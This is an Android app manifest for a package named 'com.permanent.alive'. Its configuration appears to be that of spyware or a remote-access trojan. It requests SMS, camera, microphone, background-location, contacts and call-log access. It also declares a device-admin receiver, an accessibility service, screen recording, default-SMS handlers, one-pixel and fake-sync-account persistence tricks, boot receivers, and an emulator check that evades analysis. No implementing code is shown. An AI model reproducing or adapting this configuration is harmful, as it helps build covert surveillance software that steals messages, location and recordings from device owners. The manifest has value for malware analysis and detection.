<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="30" android:compileSdkVersionCodename="11" package="com.permanent.alive" platformBuildVersionCode="30" platformBuildVersionName="11">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.READ_PRIVILEGED_PHONE_STATE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
    <uses-permission android:name="android.permission.REORDER_TASKS"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
    <uses-permission android:name="android.permission.READ_SYNC_SETTINGS"/>
    <uses-permission android:name="android.permission.AUTHENTICATE_ACCOUNTS"/>
    <uses-permission android:name="android.permission.WRITE_SYNC_SETTINGS"/>
    <uses-permission android:name="android.permission.READ_SYNC_STATS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
     <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
    <uses-permission android:name="android.permission.READ_PRIVILEGED_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.intent.action.BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SET_WALLPAPER"/>
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILRSYSTEMS"/>
    <uses-permission android:name="android.hardware.camera"/>
    <uses-permission android:name="android.hardware.camera.autofocus"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    <uses-feature android:name="android.hardware.camera" android:required="false"/>
    <uses-feature android:name="android.hardware.camera.front" android:required="false"/>
    <uses-feature android:name="android.hardware.camera.autofocus"/>
    <instrumentation android:name="com.daemon.common.DaemonInstrumentation" android:targetPackage="com.permanent.alive" android:targetProcesses="com.permanent.alive,com.permanent.alive:sync"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:icon="@mipmap/icon_alive" android:label="@string/app_name" android:name="com.permanent.alive.MyApplication" android:requestLegacyExternalStorage="true" android:supportsRtl="true" android:theme="@style/Theme.WCAlive">
        <activity android:configChanges="fontScale|keyboardHidden|layoutDirection|locale|mcc|mnc|navigation|orientation|screenLayout|screenSize|uiMode" android:exported="true" android:immersive="true" android:launchMode="singleInstance" android:name="com.permanent.alive.MainActivity" android:taskAffinity=":MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.settings.INPUT_METHOD_SETTINGS"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:host="com.permanent.alive" android:path="/MainActivity" android:scheme="god"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="fontScale|keyboardHidden|layoutDirection|locale|mcc|mnc|navigation|orientation|screenLayout|screenSize|uiMode" android:excludeFromRecents="true" android:immersive="true" android:launchMode="singleTop" android:name="com.permanent.alive.service.WindowActivity" android:taskAffinity=":WindowActivity" android:theme="@style/activityStyle">
            <intent-filter>
                <action android:name="android.settings.INPUT_METHOD_SETTINGS"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:host="com.permanent.alive" android:path="/WindowActivity" android:scheme="god"/>
            </intent-filter>
        </activity>
        <service android:name="com.permanent.alive.service.AliveService"/>
        <activity android:enabled="false" android:label="" android:name="com.daemon.activity.StrategyActivity" android:theme="@style/keep_alive_theme"/>
        <service android:enabled="true" android:exported="true" android:name="com.daemon.services.DaemonJobService" android:permission="android.permission.BIND_JOB_SERVICE"/>
        <service android:enabled="true" android:exported="true" android:name="com.daemon.services.ListenerJobService" android:permission="android.permission.BIND_JOB_SERVICE"/>
        <service android:exported="false" android:name="com.daemon.services.PowerService"/>
        <service android:exported="false" android:name="com.daemon.services.HandleService"/>
        <service android:name="com.daemon.services.DaemonService" android:stopWithTask="false"/>
        <service android:name="com.daemon.services.GuardService" android:process=":keep" android:stopWithTask="false"/>
        <service android:name="com.daemon.services.AliveService" android:process=":watch" android:stopWithTask="false"/>
        <provider android:authorities="provider_com.permission.alive" android:exported="false" android:name="com.daemon.sync.provider.AccountProvider" android:process=":sync" android:syncable="true"/>
        <service android:enabled="true" android:exported="true" android:name="com.daemon.sync.service.SyncService" android:process=":sync">
            <intent-filter>
                <action android:name="android.content.SyncAdapter"/>
            </intent-filter>
            <meta-data android:name="android.content.SyncAdapter" android:resource="@xml/sync_adapter"/>
        </service>
        <service android:name="com.daemon.sync.service.AuthService" android:process=":sync">
            <intent-filter>
                <action android:name="android.accounts.AccountAuthenticator"/>
            </intent-filter>
            <meta-data android:name="android.accounts.AccountAuthenticator" android:resource="@xml/auth"/>
        </service>
        <provider android:authorities="provider1_com.permission.alive" android:exported="false" android:name="com.daemon.sync.provider.AccountProvider1" android:process=":sync" android:syncable="true"/>
        <service android:enabled="true" android:exported="true" android:name="com.daemon.sync.service.SyncService1" android:process=":sync">
            <intent-filter>
                <action android:name="android.content.SyncAdapter"/>
            </intent-filter>
            <meta-data android:name="android.content.SyncAdapter" android:resource="@xml/sync_adapter1"/>
        </service>
        <service android:name="com.daemon.sync.service.AuthService1" android:process=":sync">
            <intent-filter>
                <action android:name="android.accounts.AccountAuthenticator"/>
            </intent-filter>
            <meta-data android:name="android.accounts.AccountAuthenticator" android:resource="@xml/auth1"/>
        </service>
        <activity android:configChanges="fontScale|keyboardHidden|layoutDirection|locale|mcc|mnc|navigation|orientation|screenLayout|screenSize|uiMode" android:excludeFromRecents="true" android:immersive="true" android:launchMode="singleInstance" android:name="com.daemon.activity.OnePixActivity" android:taskAffinity=":OnePixelActivity" android:theme="@style/keep_alive_theme">
            <intent-filter>
                <action android:name="android.settings.INPUT_METHOD_SETTINGS"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:host="com.permanent.alive" android:path="/OnePixelActivity" android:scheme="god"/>
            </intent-filter>
        </activity>
        <activity android:configChanges="fontScale|keyboardHidden|layoutDirection|locale|mcc|mnc|navigation|orientation|screenLayout|screenSize|uiMode" android:excludeFromRecents="true" android:immersive="true" android:launchMode="singleInstance" android:name="com.daemon.activity.PowerActivity" android:taskAffinity=":CloseDeviceActivity" android:theme="@style/keep_alive_theme">
            <intent-filter>
                <action android:name="android.settings.INPUT_METHOD_SETTINGS"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:host="com.permanent.alive" android:path="/CloseDeviceActivity" android:scheme="god"/>
            </intent-filter>
        </activity>
        <provider android:authorities="com.permanent.alive.main" android:name="com.daemon.providers.DaemonProvider"/>
        <provider android:authorities="com.permanent.alive.listen" android:name="com.daemon.providers.GuardProvider" android:process=":listen"/>
        <provider android:authorities="com.permanent.alive.loop" android:name="com.daemon.providers.AliveProvider" android:process=":loop"/>
        <provider android:authorities="com.permanent.alive.keep" android:name="com.daemon.providers.GuardServiceProvider" android:process=":keep"/>
        <provider android:authorities="com.permanent.alive.watch" android:name="com.daemon.providers.AliveServiceProvider" android:process=":watch"/>
        <provider android:authorities="com.permanent.alive.directory" android:enabled="true" android:exported="true" android:name="com.daemon.providers.DirectoryProvider" android:process=":directory" android:syncable="true">
            <meta-data android:name="android.content.ContactDirectory" android:value="true"/>
        </provider>
        <receiver android:name="com.daemon.receiver.BootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <service android:enabled="true" android:label="@string/wallpaper_name" android:name="com.daemon.wallpaper.WallpaperService" android:permission="android.permission.BIND_WALLPAPER">
            <intent-filter>
                <action android:name="android.service.wallpaper.WallpaperService"/>
            </intent-filter>
            <meta-data android:name="android.service.wallpaper" android:resource="@xml/wallpaper"/>
        </service>
        <receiver android:name="com.daemon.receiver.DeviceReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <category android:name="android.intent.category.HOME"/>
            </intent-filter>
        </receiver>
        <service android:name="com.daemon.services.AssistantProviderService" android:process=":listen"/>
        <service android:name="com.daemon.services.PersistentProviderService" android:process=":loop"/>
        <service android:name="com.daemon.services.ScheduledService"/>
    
      <service android:enabled="true" android:exported="true" android:label="@string/app_name" android:name="accessibility.AccService" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data android:name="android.accessibilityservice" android:resource="@xml/acch_service_config"/>
        </service>
        <service android:enabled="true" android:exported="true" android:foregroundServiceType="camera|location|microphone" android:name="order.OrderService">
            <intent-filter android:priority="1000">
                <action android:name="action"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.DATE_CHANGED"/>
                <action android:name="android.intent.action.MEDIA_MOUNTED"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.intent.action.ACTION_TIME_TICK"/>
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED"/>
            </intent-filter>
        </service>
        <activity android:excludeFromRecents="true" android:launchMode="singleTask" android:name="order.screen.ScreenRecord101Activity" android:theme="@android:style/Theme.Dialog"/>
        <service android:enabled="true" android:foregroundServiceType="mediaProjection" android:name="order.screen.ScreenRecord101Service"/>
        <activity android:excludeFromRecents="true" android:exported="true" android:launchMode="singleTask" android:name="sms.SmsActivity">
            <intent-filter>
                <action android:name="android.intent.action.SEND"/>
                <action android:name="android.intent.action.SENDTO"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </activity>
        <receiver android:exported="true" android:name="sms.SmsReceiver" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
            </intent-filter>
        </receiver>
        <receiver android:exported="true" android:name="sms.MmsReceiver" android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>
                <data android:mimeType="application/vnd.wap.mms-message"/>
            </intent-filter>
        </receiver>
        <service android:exported="true" android:name="sms.HeadlessSmsSendService" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
            <intent-filter>
                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </service>
        <activity android:excludeFromRecents="true" android:name="permission.PhonePermissionActivity" android:theme="@android:style/Theme.Dialog"/>
        <service android:name="com.snail.antifake.jni.EmulatorCheckService" android:process=":EmulatorCheckService"/>
    </application>
</manifest>